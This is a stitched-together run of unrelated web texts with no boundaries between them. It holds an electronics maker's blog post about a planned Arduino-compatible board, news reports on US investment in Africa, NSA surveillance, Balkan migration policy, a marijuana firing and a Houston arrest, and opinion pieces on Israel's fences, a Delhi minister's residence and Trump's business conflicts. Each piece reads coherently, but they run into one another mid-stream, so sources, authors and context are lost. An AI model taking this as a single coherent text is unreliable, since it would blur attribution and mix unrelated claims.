`` Technology has given us new tools . Modernity and science too . But the key to everything , in terms of the leadership aspect , is to understand the people that you are working with today . ''
It has been awfully quiet on the public front here for sure , but I have been working on quite a bit of things behind the scenes here at Etherkit Galactic HQ . It 's been a challenging year since I last wrote about the personal things going on here , but things have been going reasonable well after a rough half-year immediately following that post . I 'm just about ready to attempt to revamp Etherkit , however there are still a few challenging roadblocks to overcome , and I could use a bit of guidance .
The most difficult issue is trying to re-bootstrap the business financially . I 'm currently only selling the Si5351A Breakout Board , which obviously is n't enough to expand a business upon . The possibility of a capital infusion unfortunately broke down , and so the only practical way forward at this point is most likely another crowdfunding campaign .
As mentioned in the opening paragraph , I have been working on various projects , and so I do have some candidates . Many of the projects that are in the works or only even in the planning stages require the use of a microcontroller , and so last year I decided to make my own Arduino-compatible microcontroller board family which I can then use as the heart of many of these products . I 've taken a real liking to the Arduino Zero because of its speed and features , but the cost is fairly high and the standard Arduino form factor is n't great for many purposes . Therefore , I have decided to make a new standalone board derived from the Zero which I call Empyrean , and you can see in the photo at the top of the post . It comes in two flavors : Alpha and Beta . The Alpha is based on the Atmel ATSAMD21G18A microcontroller , same as the Arduino Zero . The Beta uses a controller ( ATSAMD21G16B ) with a bit less flash and RAM than the Zero ( but still more than an Arduino Uno ) , but is also priced similarly to the ATmega328 line of microcontrollers . Both come on a small board similar in size to the Nano and has nearly all of the same circuitry of the Arduino Zero except for the EDBG support .
It is true that there are a flood of Arduino clones out there and this makes entering the market with another one somewhat crazy . My value proposition for Empyrean is based on the confluence of breadboard-friendly form factor along with a wallet-friendly price . My target price point is around $ 15 for Alpha and $ 10 for Beta . While that is a fair bit more than your typical eBay Nano clone , Empyrean would also be quite a bit more powerful than a Nano , in both clock speed and available memory . So my question to you , dear reader , is whether you would be interested enough in this product to back a crowdfunding campaign in order to have it made ? I do plan to make a serious push on a radio soon , but it would be nice to ramp up the business before that , while also solidifying the microcontroller platform that will be used in future products . Let me know what you think in the comments , or send me an email .
In the meantime , I thought I 'd let you know that I 'm working on a Rev D board spin of the Si5351A Breakout Board . You can see a prototype in beautiful OSHPark purple above . The most significant changes in this revision will be to change the coupling of the reference oscillator to the Si5351 XA input pin to meet datasheet specs and to panelize the board in preparation for future pick-and-place operations ( they are currently hand-assembled ! ) .
Perhaps even more interesting is that I also hope to be able to soon offer a frequency calibration report with every board sold . Thanks to LA3PNA , I am now in possession of a decent 10 MHz GPSDO to use as a lab reference , which will allow me to measure the frequency correction value accurately enough for hobbyist usage . I now have a small printer on hand , and so now what I need to do is add new code to my board test script to measure the correction value and print it for inclusion with each board sold . Stay tuned for notification when I 'm ready to go live with this ; hopefully soon .
Let me reiterate : I 'd love to hear your thoughts about the above proposals . I 'm interested in serving the needs of my customers . Thank you !
WASHINGTON ( AP ) — The Obama administration on Tuesday announced $ 14 billion in commitments from U.S. businesses to invest in Africa , as representatives from nearly 100 American and African companies gathered in Washington to discuss ways to boost economic partnerships .
During a panel discussion with CEOs , former President Bill Clinton declared that the U.S. has “ only barely scratched the surface ” of Africa 's economic potential .
Indeed , Africa 's economy is enjoying rapid advancement . The continent is home to six of the world 's fastest-growing economies . And a decade of solid growth has created a middle class with increased spending power — 350 million strong in 2010 by the African Development Bank 's count , up from 220 million in 2000 .
Other nations , most notably China , have been moving aggressively to tap into growing African markets . China surpassed the U.S. as Africa 's largest trading partner in 2009 .
“ We also realize we have some catching up to do , ” said Michael Bloomberg , the former New York City mayor and a billionaire businessman . “ We are letting Europe and China go faster than the U.S . ”
President Barack Obama was scheduled to address the business summit Tuesday afternoon . The American companies represented at the day-long meeting include Chevron , Coca-Cola Company , IBM and Mastercard .
Also participating in the forum was Jeff Immelt , the CEO of General Electric . During the panel moderated by Clinton , Immelt appealed to the U.S. Congress to renew the charter for the Export-Import Bank , which helps finance American exports .
Some Republicans want to shutter the bank when Congress returns from recess next month , arguing that the bank 's spending is politically motivated and unnecessary . But Immelt said Tuesday that the bank signals to other countries that the U.S. government is interested in investing overseas .
“ The fact that we have to sit here and argue for it is just wrong , ” he said .
The business commitments being announced by the Obama administration Tuesday include a $ 2 billion investment by GE by 2018 , $ 200 million in investments across Africa by Marriott , and a $ 66 million commitment by IBM to provide technology services to Ghana 's Fidelity Bank .
The business forum is part of a broader U.S.-Africa summit being held in Washington this week . Nearly 50 African heads of state are in Washington for the three-day conference .
Beyond boosting business ties , the summit also focuses on security partnerships and supporting a new generation of African leaders .
The internet is a web of lies .
That 's according to new research looking at online honesty , which found that `` online deception is the rule , not the exception . ''
Dan Misener — CBC Radio 's ever-truthful technology columnist — looks at how and why we lie online .
What did the researchers want to find out ?
This research — published in the journal Computers in Human Behaviour — was conducted by a team of researchers who were interested in online honesty . As they put it , they wanted to find out `` whether or not people are depicting their true selves online . ''
Researchers wanted to know about our own honesty — but also how truthful we believe others are . So they looked at this question across a few different types of websites :
Social networking sites like Facebook , Instagram , and Twitter .
Online dating sites like Match.com and Tinder
Anonymous chat rooms
And what they call `` sexual communication websites . ''
They wanted to know if the type of website makes a difference — not just in how much we lie online , but how much we expect others to lie online .
And yes , the researchers did acknowledge that measuring dishonesty is tricky business .
What kinds of lies are we talking about ?
Michelle Drouin is a psychology professor at Indiana University Purdue Fort Wayne , and was one of the authors of the new research .
Dr. Michelle Drouin was one of the authors of the new research on online honesty . She says people are most honest on social media sites because they have the most links to the outside world . ( drmichelledrouin.com ) She said people reported lying about all kinds of things — their age , their gender , their appearance , activities and interests .
Of the different types of sites they measured , people were most likely to be honest on social media sites like Facebook . Nearly 32 per cent of people said they were `` always honest '' on social media .
`` The reason for this is because these social media sites , we posited , have the most links to the outside world , '' said Drouin .
`` It 's a lot harder to lie about your gender or your age , for example , when you have pictures of yourself , pictures of your family , and most importantly , shared acquaintances . ''
People were a little less honest on dating sites and less honest still on anonymous chat sites . People were the least likely to be honest on `` sexual communication '' websites like Craigslist 's casual encounters .
What about our expectations of others ' honesty online ?
People were the least likely to be honest on `` sexual communication '' websites — like Ashley Madison and Craigslist 's 'casual encounters ' section . ( Lee Jin-man/The Associated Press ) The short answer is that our expectations about others ' honesty tend to mirror our beliefs about our own honesty . In other words , on sites where we believe we 're being honest , we 're more likely to expect honesty from others .
But across the board , our expectations of others ' honesty were pretty low . Between 55 and 90 per cent of participants in the study believed that others were lying at least some of the time about their age , gender , activities , interests and appearance .
The most commonly expected lie is appearance — 90 per cent of participants expected others to lie about what they look like .
But perhaps most fascinating about this study is its finding that our expectations of other people 's honesty influences our own honesty — when we think other people are lying online , we 're more likely to lie ourselves .
Does this study explain why people are dishonest ?
According to Drouin , most people reported lying online in order to make themselves appear better .
`` They wanted to be cooler . They wanted to be more beautiful . They wanted to be sexier . They wanted to give an appearance of a life that was better than the life that they were leading , '' she said .
But there were other reasons too .
`` Others said that they lied because they just thought everyone lies online . This is the place where lying is standard . ''
Why is it important to understand online deception ?
If we have a better understanding of dishonesty online — and the degree to which other people expect dishonesty online — we can be less naive in our online interactions .
But there may be something deeper at work here . Research suggests there 's a difference between the lies we tell face-to-face , and the lies we tell online . Face-to-face lies are often spontaneous , whereas online lines can require more planning . They 're more calculated .
Much of our understanding about human relationships is based on studying face-to-face interactions in the physical world . But as more and more aspects of our lives move online , it 's important to understand how the medium itself can impact our relationships — especially when we consider that we have a generation of people who are growing up in a world where most socializing happens on the internet .
And if lying and deception is the default behaviour , Drouin thinks it could be having a profound effect on trust in relationships — and that 's something worth better understanding .
The rule of silence , also referred to as the silence is golden rule , is an important part of the Unix philosophy that states that when a program has nothing surprising , interesting or useful to say , it should say nothing . It means that well-behaved programs should treat their users ' attention and concentration as being valuable and thus perform their tasks as unobtrusively as possible . That is , silence in itself is a virtue . There is no single , standardized statement of the Unix philosophy , but perhaps the simplest description would be : `` Write programs that are small , simple and transparent . Write them so that they do only one thing , but do it well and can work together with other programs . '' That is , the philosophy centers around the concepts of smallness , simplicity , modularity , craftsmanship , transparency , economy , diversity , portability , flexibility and extensibility . This philosophy has been fundamental to the the fact that Unix-like operating systems have been thriving for more than three decades , far longer than any other family of operating systems , and can be expected to see continued expansion of use in the years to come , particularly in the form of Linux . The rule of silence is one of the oldest and most persistent design rules of such operating systems . As intuitive as this rule might seem to experienced users of such systems , it is frequently ignored by the developers of other types of operating systems and application programs for them . The result is often distraction , annoyance and frustration for users . There are several very good reasons for the rule of silence : ( 1 ) One is to avoid cluttering the user 's mind with information that might not be necessary or might not even be desired . That is , unnecessary information can be a distraction . Moreover , unnecessary messages generated by some operating systems and application programs are sometimes poorly worded , and can cause confusion or needless worry on the part of users . ( 2 ) A second reason is to avoid cluttering the display screen . Even today , screen space can be very limited in some special situations . ( 3 ) A third reason is that command line programs ( i.e. , all-text mode programs ) on Unix-like operating systems are designed to work together with pipes , i.e. , the output from one program becomes the input of another program . This is a major feature of such systems , and it accounts for much of their power and flexibility . Consequently , it is important to have only the truly important information included in the output of each program , and thus in the input of the next program . The rule of silence does not mean that any less information is available . Rather , by default it just does not provide information that is likely to be unnecessary in most situations . However , it allows the user to use options , also referred to as switches , to view detailed information if desired . Many command line programs have a verbose option , and it is typically -v. The rule of silence originally applied to command line programs , because all programs were originally command line programs . However , it is just as applicable to GUI ( graphical user interfaces ) programs . That is , unnecessary and annoying information should be avoided regardless of the type of user interface . A example is the useless and annoying dialog boxes ( i.e. , small windows ) that pop up on the display screen with with surprising frequency on some operating systems and programs . These dialog boxes contain some obvious , cryptic or unnecessary message and require the user to click on them in order to close them and proceed with work . This is an interruption of concentration and a waste of time for most users . Such dialog boxes should be employed only in situations in which some unexpected result might occur or to protect important data . The rule of silence originated because UNIX was originally developed prior to the availability of high quality video displays . Most output was sent to slow printing terminals , and each line of unnecessary output was a significant drain on the user 's time . Although that constraint is long gone , excellent reasons for terseness remain . As is the case with so much else in the Unix philosophy , the rule of silence can apply to much more than just computers . For example , controls for products should be designed to by default just to provide the information that is most likely to be necessary or interesting for most users in order to minimize distractions and possible user errors . But it should be easy for users to make adjustments so that additional information can be provided if desired . A key to the ability to apply the rule of silence is to make the operation of computers , industrial controls and other products as intuitive as possible so that dialog boxes , windows with explanations , tooltips , buzzer sounds , etc . are rarely necessary by default ( but can be easily turned on if and when desired ) . This is also a key to good documentation for products , i.e. , minimize the need for it in the first place , but then make it readily available for providing information beyond what most users need or want to known most of the time . Some people might feel that the rule of silence could also be applied to ambient noise . For example , announcements over loudspeakers and the prerecorded music which is continuously played in some stores , restaurants , hotel lobbies , elevators ( and is often referred to as elevator music ) is providing information ( if music can be considered information ) that some people enjoy . However , others find it distracting or even extremely annoying , including many people who truly like music . Thus , the rule of silence would imply that silence should be the default situation and those people who want to listen to music can use personal audio devices or go to special locations for listening to it , rather than requiring that some percentage of the people be annoyed , have to complain and/or have to wear earplugs . Likewise , announcements over loudspeakers should be saved for true emergencies rather than being the default means for providing what is often trivial or unnecessary information .
Created January 5 , 2006 .
Copyright © 2006 The Linux Information Project . All Rights Reserved .
We know that little is off-limits to the prying eyes of the NSA . But what is surprising is that the Foreign Intelligence Surveillance Court gave it free reign to spy on virtually whoever it wished back in 2010 .
Advertisement
A report from the Washington Post reveals that the FISA court certified a list of 193 countries deemed to be of `` valid interest '' to the U.S. along with a raft of international organizations , too . That certification gave the NSA permission to to gather intelligence about all of the countries on the list , as well as entities as diverse as the World Bank , the European Union and the International Atomic Energy Agency .
It 's not clear whether the NSA has actively been targeting all the countries or organizations identified in the certification . But the documents do indicate that the NSA has been granted far more wide-ranging legal approval to spy than we were aware of in the past .
The U.S. is part of a no-spying arrangement with four countries—Britain , Canada , Australia and New Zealand—but clearly others are n't so lucky . From Belize to Bhutan , Ireland to Iraq , this list shows that Foreign Intelligence Surveillance Court sees , and has since 2010 , any other country as fair game for the NSA . [ Washington Post ]
Advertisement
Image by AP .
Austrian authorities are intent on being well-prepared for any future movement of migrants . In the opinion of Austrian Interior Minister Wolfgang Sobotka , good cooperation with neighboring countries is essential .
After bilateral meetings with his counterparts from Italy and Hungary , he met with police chiefs from the Balkan countries at the interior ministry in Vienna . Just days before , the heads of border police agencies from these countries had also come together .
`` Migration movements through the eastern Balkan route and the central Balkan route are , as always , cause for concern . We must carefully observe these routes , like the route through Bulgaria and Romania or Bulgaria and Serbia , '' Sobotka said .
Vienna hosted the first Western Balkans conference on the refugee crisis in February
`` We will be on alert ''
Police chiefs from Bulgaria , Greece , Croatia , Macedonia , Poland , Romania , Serbia , Slovakia , Slovenia , the Czech Republic and Hungary as well as representatives from Europol and Frontex met in Vienna . According to the information they released , they agreed on `` police measures for handling uncontrolled migration in the future . ''
`` Because of Austria 's geographical location , the country is affected by migration through the western Balkan route and the Mediterranean route . We will be on alert if any routes through Bulgaria , for example , are extended , '' said Konrad Kogler , general director of public security in Austria 's interior ministry . `` We will only be able to successfully combat uncontrolled migration if we closely coordinate our security measures . ''
The meeting of police chiefs is seen as a preparatory measure ahead of the next big Balkan refugee conference being planned by the Austrian interior ministry . Sobotka said that the upcoming conference will ensure that the `` Balkan route stays closed . ''
New migrant routes are more dangerous
Fabrice Leggeri , the executive director of the border protection agency , Frontex , is concerned about the shift in migrant routes , which he says is placing a massive burden on Italy . He said that the number of refugees traveling from Libya to Italy is 13 to 14 times greater than the number crossing to Greece from Turkey . He added that the central Mediterranean route is being used more than ever , and the number of illegal border crossings between Libya and Italy exceeds the number of all other illegal border crossings in the EU .
It 's mainly refugees from western Africa and the Horn of Africa that are using this route , the Frontex director said . `` There is persecution and a brutal dictatorship in Eritrea ; the people are in need of protection , '' Leggeri said . `` Many flee from Senegal , Gambia , the Ivory Coast and Niger because they lack economic prospects . '' People embark on the dangerous journey to Europe across the Mediterranean from Egypt , which Leggeri said is likely to develop into a new hub for refugees .
After meeting his Italian counterparts , Austria 's interior minister Sobotka said that Europe needs functioning external border protection and official registration centers known as `` hotspots '' in Italy . Austria said it is willing to send immigration experts to help out at the Italian hotspots , as well as to help set up hotspots on the coast . That way , refugees can already be registered when they 're aboard ships . `` It is important that those not in need of protection can be sent back and those in need of protection can be taken care of in Italy , '' Sobotka emphasized .
Smugglers are benefitting from the closure of the Balkan route
The European Union has seen a drastic reduction in the number of newly arriving migrants thanks to the closure of the Balkan route and the EU-Turkey refugee deal . However , the problem with smugglers is gaining in significance again because of the border closures , said historian Armina Galijas from the Center for Southeast European Studies in Graz , Austria . `` The people have not disappeared ; they are still there but their situation has become more difficult . Now they barely have any help and support , and the smuggling business is flourishing . Smugglers now ask for considerably more money than before , '' said Galijas following a visit to Belgrade .
Migrants walking down a road in Mistlberg near the German border in November 2015
The historian was critical of what she sees as a degree of hypocrisy on the part of the European Union with regard to the refugee crisis . `` Many politicians from the Balkan countries are branded authoritarian and nationalist by the EU , but when they support EU plans for more restrictive refugee policies then they are suddenly important partners , '' said Galijas .
Now Austria and its partners from the Balkan states are devising new plans to cope with the future of the refugee crisis . `` At the beginning of the year , a strong cooperation between our countries was crucial in order to get the situation along the western Balkan route under control , '' said Konrad Kogler after the meeting of police chiefs in Vienna . This most recent meeting was designed to ensure that nothing changes .
In January , the government of Israel announced that it plans to build a fence along its frontier with Syria , because the Syrian army appears to have receded from the border area and jihadist forces have moved in . It is no wonder that the anarchy and the atrocity in Syria causes consternation in Israel ; but this announcement left me with a heavy heart for another reason . With the erection of this northern barrier , Israel will be almost completely fenced in . The fences—in their most prominent locations , the high concrete slabs—that demarcate Israel from the Palestinians to the east are the most famous , or infamous , of these partitions ; originally Yitzhak Rabin 's idea in the early 1990s , when “ separation ” was the regnant fantasy of Israel 's doves , it was begun in earnest in 2002 , and 62 percent of its projected length of 440 miles has been completed . To the south , Israel has constructed a steel and wire barrier that runs the 150-mile length of its border with Sinai , which has now become a perilous and ungovernable waste . As it approaches the Mediterranean , this new fence will meet the old fence that Israel built around Gaza , 32 miles long with a buffer zone . Israel long ago put up a fence along its border with Lebanon . The only open border remaining—aside from the glistening apolitical sea to the west—is with Jordan to the southeast , from the Dead Sea to the Red Sea . The state is walled .
There are two ways to understand these comprehensive fortifications . The first is that they make Israel safer . Since the threats encircle Israel , the barriers encircle Israel . Their efficacy from the standpoint of security can not be denied . The wall that runs north to south through the West Bank has spectacularly reduced Israel 's vulnerability to homicidal infiltrations , even if the barrier with Gaza has done nothing to deter the violence of the rockets that fly above it . Physical threats must be countered physically . ( Israel is not the only country that has reached such a conclusion : the United States , India , South Africa , Saudi Arabia , Thailand , and other polities have also resorted to fences and walls . ) It was not until Palestinian “ resistance ” chose to rely on suicide bombers that the big , cold wall was raised . A criticism of Israel 's “ security fence ” —the common Israeli appellation for what Palestinians call a “ wall of racial separation ” —that does not take seriously its success in thwarting terrorism can not itself be taken seriously . Of course such criticisms abound : a wall between peoples is an ugly thing , though a massacre—and a strategy of massacre—is even uglier . About the racial character of the wall the Palestinians are wrong , but there is a second way , as I say , to understand the wall , and it has nothing to do with Israeli safety .
The argument from security can not account for the precise contours of the partition . “ Before I built a wall I 'd ask to know / What I was walling in and walling out , ” declares the most celebrated poem about fences , “ and to whom I was like to give offense. ” The West Bank wall denotes not only protection but also domination . A wall is an instrument of power , a political interpretation of space . It has two sides , and they are experienced differently . The wall has been cunningly drawn to include many Israeli settlements in the West Bank on the Israeli side of the line : it is a blunt premonition of sovereignty . It has also senselessly disrupted the communal and economic life of many Palestinians . If good fences make good neighbors , then bad fences make bad neighbors .
If good fences make good neighbors , then bad fences make bad neighbors .
Are the barriers borders ? What is temporary and what is permanent ? The walls can be taken down , say the hopeful liberals . Maybe ; but against this rational observation one must glumly note that Israel does not have a history of reversing itself , neither left-wing governments nor right-wing ones , in the West Bank . Most of the trouble in the world today is owed to the incommensurability of political borders with security borders , of political borders with cultural borders . It is ironic , no , it is tragic , that in an era of unprecedented mobility and migration the ideal of multi-ethnicity falls increasingly into disrepute ; but almost everywhere one looks one sees a demand for ethnic clarifications and sectarian consolidations . Israel is a multi-ethnic society , whatever its jingoists say . There is no significant hunger in Israel for social or cultural homogeneity ( except among the haredim and their ayatollahs ) , even if the state is dealing poorly with certain aspects of its heterogeneity . But the dead calm of Israel 's Palestinian policy , the ominous stagnation that is Benjamin Netanyahu 's contribution to the annals of his country 's diplomacy , is insanely shortsighted , a consequence of indifference abetting fanaticism . The humbling of Netanyahu in the recent election was delightful , but Yair Lapid is a passing phenomenon . His participation in the government will not alter its Palestinian policy . You can not fight strong sentiments with weak sentiments . Lapid is new to the cause , if indeed he has joined it . He will merely provide more cover for more settlement and more drift .
The ongoing brouhaha over the bungalow for Delhi 's new chief minister Arvind Kejriwal is being magnified and here is how – he is being allocated a Central government owned duplex to live in and an identical one next door for what is called a camp office .
His two bungalows put together do not make for huge real estate and is not being provided so that the leader of the aam aadmi could live in luxury . He currently lives in a four-bedroom housing allocated to his wife , an Indian Revenue Service official . His upgrade is by just one bedroom .
The other is for his work . Such additional workplaces are standard provision and practice as it cuts down on time and adds to the efficiency of the entire outfit Kejriwal leads . Of course , a camp office means the officials have to flit around from the secretariat to the CMO to the camp office .
The bungalow that was Sheila Dikshit 's home for 15 years has both the residence and the camp office within one . Here , they are separate blocks and that 's just about it . Their functions blur the home-workplace division and nothing could better illustrate that than what Anjaiah , Andhra Chief Minister had once lamented about .
They were less security-sensitive days and people had free access to the leaders . He is the person who was insulted by Rajiv Gandhi leading to Telugu Desam 's emergence . One day , a person seeking a job had knocked on his bathroom door , interrupting his shower . “ Even my toilet is my office ” , he had told me .
Before we chide Kejriwal – which I have no inclination to –one has to only ignore the huge Lutyen 's Delhi and look at the residences of the district magistrates or district collectors . They are huge enough to keep some rooms locked . A chief minister 's job requires him to summon meetings , call officials , at all and any hour of the day or night depending on the exigencies of the circumstances .
Despite governments seen as slow-moving , tangled in red tape , time a flexible concept , the CM 's office – and home – is a place that hums . This is why they have big offices , extensive staff , and at the very place they live in , and it is called a camp office . A CM 's work follows him home and I have seen many reading files in their cars . Those who do n't are slackers , which is worse than red tape .
A camp office , as the word could suggest , is not a tent or merely a room or a simple study . For this elected person , the office at home is a virtual replication of his actual office . A conference table to seat the cabinet with departmental officials is required . Their personal assistants and drivers work in shifts .
This brouhaha , lamenting that Kejriwal was quickly drifting away from the aama admi type of lifestyle , betrays a misunderstanding of a chief minister 's functions . They are not limited to making speeches and cutting ribbons and providing bytes to the by now ubiquitous television cameras . They have things to do which are not seen from outside . Even if he is leading a government of a party avowedly of the common man , he can not be expected to do that from a smaller apartment in which we mango people are settled in . By moving him to a smaller place , officials and politicians are depriving his family of their deserved privacy . As it is , they would get fewer quality hours from a CM .
Refusing the official residence which Dikshit had occupied was a gesture to the people , even a tokenism , that he was downsizing the privileges the chief minister was entitled to . It does not mean that he moved to government quarters elsewhere where the callers ca n't have a place to park in .
These gestures are not empty . Like deciding not to have beacons on the cars used by the ministers is not . It drives home a point that the leader is sensitive to the discomfort caused to the ordinary persons . That does not mean they should not have government cars . They need to travel in their official duties .
So once it is understood that his upgrade is not as big as is being made out on the misunderstanding that Kejriwal was getting two bungalows , of which the second one was only a facilitator for his work , the grumbles should cease . Just because he is now a chief minister is no reason why he should be put to discomfort .
Firstpost is now on WhatsApp . For the latest analysis , commentary and news updates , sign up for our WhatsApp services . Just go to Firstpost.com/Whatsapp and hit the Subscribe button .
An Arlington DPW worker was fired after the police chief caught him smoking marijuana with another man , while he was at work on the Minuteman Bikeway by the old Brigham 's Ice Cream Factory .
An Arlington DPW worker was fired after the police chief caught him smoking marijuana with another man , while he was at work on the Minuteman Bikeway by the old Brigham 's Ice Cream Factory .
Last Monday afternoon , Police Chief Fred Ryan was walking down the bike path when he approached two men on a tractor wearing orange vests . Ryan caught a whiff of burning marijuana and allegedly saw them passing a pipe to one another , according to the police report .
Ryan approached the two , identified himself and questioned them .
The two men were aged 18 and 20 , one of them was employed for the summer by the DPW while the other had been employed the previous year .
Their supervisor was called , and they were fired that day , according to DPW Director John Bean .
The two men will be issued a civil citation for possession of marijuana . This year , Town Meeting passed a bylaw adding a $ 300 penalty for public consumption of marijuana , but Town Meeting 's decisions have not yet been approved by the attorney general .
Today , a large majority of voters in Florida approved Amendment 2 , a ballot initiative that makes Florida , with its huge population and bellwether status in American politics , the very first state in the South to see a majority vote in favor of a medical marijuana law .
“ A tremendous majority of Floridians voted to legalize marijuana for medical purposes today – and that 's what really matters notwithstanding the fact that the initiative will not be implemented , ” said Ethan Nadelmann , executive director of the Drug Policy Alliance . “ Today 's vote is a confirmation of medical marijuana 's broad support across the political spectrum and sends a powerful message not just to Florida legislators but also throughout the South and even nationally . ”
Florida is the only state that requires 60 % to pass a ballot initiative . Casino owner Sheldon Adelson contributed $ 5 million dollars to stop Amendment 2 , the largest contribution ever by a single donor to oppose a drug policy initiative . Most of the $ 5 million was spent on inaccurate TV ads that eroded what had been consistently strong support . Every poll until the past month had shown between 63-85 % support for the initiative among Florida voters .
DPA 's lobbying arm , Drug Policy Action , supported this initiative with assistance on the drafting , as well as financial and other support for the campaign .
Twenty-three states and the District of Columbia have passed laws legalizing the use of marijuana for qualifying patients under state law . Since the 1990s , national polls have consistently shown public support for medical marijuana ranging from 70 to 80 percent .
HOUSTON ( Reuters ) - The marriage may be legal but the suspected premarital sex was not , authorities said on Saturday after arresting a 41-year-old Houston-area drama teacher for the alleged sexual assault of a child , his 16-year-old wife .
Ilich Guardiola , who also works as a voice actor in Japanese animations , was pulled over in a traffic stop in the Houston suburb of Spring Valley last month and later questioned about his relationship with the teen riding with him , police said .
Shortly after the incident , Guardiola married the teenager , who has not been identified , in Las Vegas with the approval of her mother , who witnessed the wedding .
Police said there is circumstantial evidence that the two engaged in a sexual relationship prior to legal marriage .
“ The marriage is absolutely legal . We received a copy of the marriage certificate , ” said Gary Finkelman of the Spring Valley Police Department .
Guardiola was arrested on Thursday at his Houston-area apartment for violating a Texas law that forbids sex with a child , regardless of the child 's consent . A child is defined as a person under 17 years of age .
Guardiola ' bail has been set at $ 50,000 and no lawyer has been listed as representing him , according to his arrest record .
You know that the only thing worse than getting hurt by someone you trust is when it 's followed by a lame apology of the “ I 'm sorry you 're mad ” variety . But you also know , being a human who has screwed up at some point , how hard it is to muster up a sincere apology . Karina Schumann , a Stanford University psychologist , just published a paper in the Journal of Experimental Social Psychology in which she describes what she believes is the key to making apologies less unpleasant for all parties involved .
It involves the 1990s Saturday Night Live character Stuart Smalley . Kind of .
“ The basic idea is that we are highly motivated to maintain a positive image of ourselves — an image of self-integrity , morality , and adequacy , ” Schumann said in an email . And this , she reasons , is why apologizing can suck so very much : Having to admit that our words or actions hurt someone else threatens our image of our ideal self . So it makes sense that so many apologies are so bad . We get defensive , so we justify our behavior , all to protect our egos .
Research has shown that refusing to admit you were wrong feels pretty great in the moment , because you get to maintain that idealized picture of yourself . But an unresolved conflict can poison a relationship ; in the workplace , it can even drive people to quit their jobs . Decades of social-psychology research confirm the basic human truth your mom taught you : If you messed up , you have to apologize .
Back to Stuart Smalley . Research has shown that one way to keep that idealized self-image intact is through self-affirmation , a concept that actually is n't too far off from Smalley 's “ I 'm good enough , I 'm smart enough , and , doggone it , people like me ! ” mantra . A less ridiculous way to go about this is to think about your goals , your values , and the things and people most important to you , Schumann said . So she reasoned that before apologizing , taking a few minutes to indulge in a little self-affirmation could make the experience less painful , which would ultimately lead to a less defensive , more effective apology .
Schumann demonstrated this by instructing 98 adults to take a survey ranking their values and personal qualities . She asked some of them to write briefly about why their highest ranked value was important to them — a form of self-affirmation . Then she told them to think of a time when they 'd done something to hurt someone else but had n't apologized for it , and what they would say if they were going to apologize . Sure enough , the people who 'd reflected on their values wrote better , less defensive apologies .
So if you wanted to use this strategy in real life , what , specifically , should you say to yourself before apologizing ? Schumann offers some guidance :
Self-affirmations are specific to the person because the value/domain being affirmed needs to be relevant and meaningful to the self . But before responding , you could reflect on something else that really matters to you in life — perhaps that is your job , your kids , your health , your creative hobbies , your group identity . By thinking about these other sources of self-worth and meaning in your life , you might feel less defensive about your behavior and more willing to respond in a way that will repair the damage done to your relationship with the person you offended .
But what exactly makes a good apology ? According to Schumann 's paper , there are eight notes you have to hit :
1 . You actually have to use the words I 'm sorry .
2 . Acknowledge that you messed up . ( As in , “ I take full responsibility for my words . ” )
3 . Tell the person how you 'll fix the situation .
4 . Describe what happened , but without foisting the blame off on someone else .
5 . Promise to behave better next time .
6 . Make sure the person knows you know exactly how you hurt or inconvenienced them .
7 . Much like the first rule , it 's important to use some version of the phrase “ I was wrong . ”
8 . Ask for forgiveness .
Bad apologies , on the other hand , tend to suffer from these four shortcomings :
1 . Justifying your words or behavior .
2 . Blaming the victim .
3 . Making excuses .
4 . Minimizing the consequences . ( “ It was just a joke ! ” )
Apologizing is never going to be fun . But the experience does n't have to be terrible .
Looking for news you can trust ?
Subscribe to our free newsletters .
Donald Trump will enter the White House with a problem no president has had : His sprawling international business empire poses the potential for conflicts of interest on an unprecedented scale . He owes large amounts of money to foreign banks , including those in Germany and China—a possible point of leverage on a commander in chief . His family-run company does deals with foreign investors and groups with political ties and interests that could run contrary to US national security concerns . With his new Washington , DC , hotel in a federally owned government building , the Trump Organization could have to negotiate with the Trump administration .
There still remains so much publicly unknown about his wide-ranging business operations that all the potential conflicts of interest can not be identified . Presidents must file a relatively undetailed personal financial disclosure , but no law compels a president to be fully transparent about his finances ( Trump can keep hiding his tax returns ) or to divest himself from his financial interests . Conflict-of-interest rules that cover federal employees do not apply to the president . Most presidents do take steps to distance themselves from their assets , but Trump has not yet detailed his plan for doing so . And in his case , his vast holdings could pose a serious constitutional problem .
Richard Painter , an attorney who served as George W. Bush 's chief White House ethics lawyer , thinks Trump could run into trouble with Article One , Section 9 of the Constitution—the emoluments clause . The clause prohibits anyone in federal office from holding a title of nobility granted by a foreign king and from accepting gifts from foreign governments . In the years before the Constitution was drafted , it was common for European monarchs to lavish gifts on ambassadors and other foreign government officials . Several early American diplomats received bejeweled trinkets and fancy horses from European nobles . The emoluments clause was designed to prevent officials from pocketing gifts that might influence them , and it requires congressional approval for senior federal office holders to accept gifts from foreign governments . And , Painter says , the clause can be interpreted as a prohibition on a government official benefiting financially from a relationship with a foreign government . And Trump appears to have just that . An investigation by the New York Times found that the president-elect holds a 30 percent stake in a partnership that borrowed $ 950 million from four lenders , including the Bank of China , which is owned by the Chinese government .
“ Any payments from foreign governments or payments from banks controlled by foreign governments would fall under the emoluments clause , ” Painter notes . “ The loans from the Bank of China could be an issue . If I were him , I 'd want to be on the safe side and get rid of all that . If I were his lawyer , that would be on the top of my list . ”
The emoluments clause has never been litigated , at least relating to a president . But questions regarding its application were raised in September—in connection with Hillary Clinton . Erik Jensen , a law professor emeritus at Case Western Reserve , was among the legal scholars who argued that the Clinton Foundation 's acceptance of gifts from foreign governments , when Clinton was secretary of state , may have violated the emoluments clause . He agrees with Painter that Trump 's holdings are problematic . Jensen says he would advise Trump to dump any asset or liability that is connected to a foreign power . “ The underlying concern is divided loyalties , and I think a reasonable governmental officer would stay as far away from the fuzzy areas ( or uncharted waters—pick your metaphor ) as possible , ” Jensen says .
Painter predicts that if the Democrats were to gain control of any house of Congress during Trump 's administration , they could cite the emoluments clause as the basis to mount a potentially embarrassing investigation into Trump 's opaque finances . “ They 'll do the investigating and play the game , ” Painter says . “ And if there 's even a whiff of an emolument clause violation , it will make Hillary 's emails look like a walk in the park . ”
The Trump campaign did not respond to a request for comment , but the Trump 's Organization 's general counsel , Michael Cohen , told CNN on Thursday that Trump 's plan is to place his assets in a “ blind trust ” that will be managed by his eldest children while he holds office . Trump floated this as a possibility during the campaign . But the plan Trump and his lawyer have described is not really a “ blind ” trust . A true blind trust is intended to remove conflicts of interest by obscuring a person 's assets . Trump is well aware of his assets—after all , in most cases they are prominently branded with his name . Just handing them over to his kids to oversee will not remove the potential conflicts of interest .
